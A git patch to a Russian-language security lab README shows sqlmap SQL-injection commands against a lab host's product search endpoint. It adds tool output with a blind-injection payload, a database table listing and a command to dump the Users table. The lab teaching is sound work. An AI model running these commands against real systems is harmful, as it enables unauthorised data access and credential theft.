From fde1a10f73c9418fcefdc77d0ae0a23ec51b8481 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D0=A1=D0=B5=D1=80=D0=B3=D0=B5=D0=B9=20=D0=A4=D0=B8=D0=BB?= =?UTF-8?q?=D0=B0=D1=82=D0=BE=D0=B2?= Date: Wed, 23 Apr 2025 10:42:05 +0000 Subject: [PATCH] =?UTF-8?q?=D0=98=D0=B7=D0=BC=D0=B5=D0=BD=D0=B8=D0=BB(?= =?UTF-8?q?=D0=B0)=20=D0=BD=D0=B0=20'labs/lab3/README.md'?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- labs/lab3/README.md | 48 ++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 47 insertions(+), 1 deletion(-) diff --git a/labs/lab3/README.md b/labs/lab3/README.md index 2151138..8e41579 100644 --- a/labs/lab3/README.md +++ b/labs/lab3/README.md @@ -340,7 +340,25 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --level=3 - Если возникнет вопрос про WAF/IPS/IDS – отвечаем N. -Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. Попробуем получить информацию о количестве и названии баз данных: +Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. + +```ssh +... +--- +Parameter: q (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: q=') AND 9603=9603 AND ('SMUf' LIKE 'SMUf +--- +[12:44:52] [INFO] testing SQLite +[12:44:52] [INFO] confirming SQLite +[12:44:52] [INFO] actively fingerprinting SQLite +[12:44:52] [INFO] the back-end DBMS is SQLite +back-end DBMS: SQLite +... +``` + +Попробуем получить информацию о количестве и названии баз данных: ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs @@ -351,12 +369,40 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --tables + +... +[20 tables] ++-------------------+ +| Addresses | +| BasketItems | +| Baskets | +| Captchas | +| Cards | +| Challenges | +| Complaints | +| Deliveries | +| Feedbacks | +| ImageCaptchas | +| Memories | +| PrivacyRequests | +| Products | +| Quantities | +| Recycles | +| SecurityAnswers | +| SecurityQuestions | +| Users | +| Wallets | +| sqlite_sequence | ++-------------------+ +... ``` После получения таблиц можно попробовать получить данные. Попробуем получить список пользователей из таблицы Users ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= -T Users --dump + + ```